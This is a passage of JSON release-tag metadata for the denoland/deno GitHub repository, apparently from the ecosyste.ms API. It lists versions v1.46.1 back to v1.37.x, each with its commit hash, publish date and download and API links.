22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.c